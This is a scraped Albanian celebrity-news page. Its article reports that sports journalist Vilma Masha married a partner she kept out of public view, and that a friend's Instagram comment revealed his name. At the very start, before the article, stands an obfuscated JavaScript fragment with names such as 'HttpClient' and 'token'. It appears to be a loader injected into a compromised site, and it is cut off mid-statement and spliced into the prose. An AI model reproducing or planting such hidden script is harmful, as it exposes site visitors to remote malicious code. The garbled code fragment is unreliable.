;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

I porositi të mos ia zbulojnë burrin, të ftuarit tradhëtojnë gazetaren sportive

By

Gazetarja sportive, Vilma Masha, pak ditë më parë kurorëzoi në martesë dashurinë e saj me partnerin, të cilin është munduar gjatë gjithë kohës ta mbajë të fshehtë dhe jashtë vëmendjes së publikut.

Ajo kishte deklaruar edhe më parë në emisione se partneri i saj nuk ishte pjesë e spektaklit dhe nuk i pëlqente daljet në publik. Për më tepër as emri i bashkëshortit të saj nuk dihej.

Madje, sipas “Panorama Plus”, moderatorja i ka porositur të ftuarit VIP në dasmë që të mos publikojnë foto të partnerit të saj për shkak se do të ruajë privatësinë.

Por siç duket, një mikja e saj e ka “tradhtuar” në rrjetet sociale, ku në një foto të Vilmës e veshur nuse, ajo e ka uruar duke përmendur edhe emrin e bashkëshortit.

“Të trashëgoheni Vilma dhe Dori! Ju uroj një jetë të mrekullueshme”, shkruhet në komentet e fotos së saj në “Instagram”.

Ndërkohë mësohet se bashkëshorti i saj punon si barist në një lokal në Itali.

Nuk dihet nëse Vilma do të vazhdojë karrierën e saj si gazetare në Shqipëri apo do të jetojë me partnerin e saj në Itali.

Artikuj të ngjashëm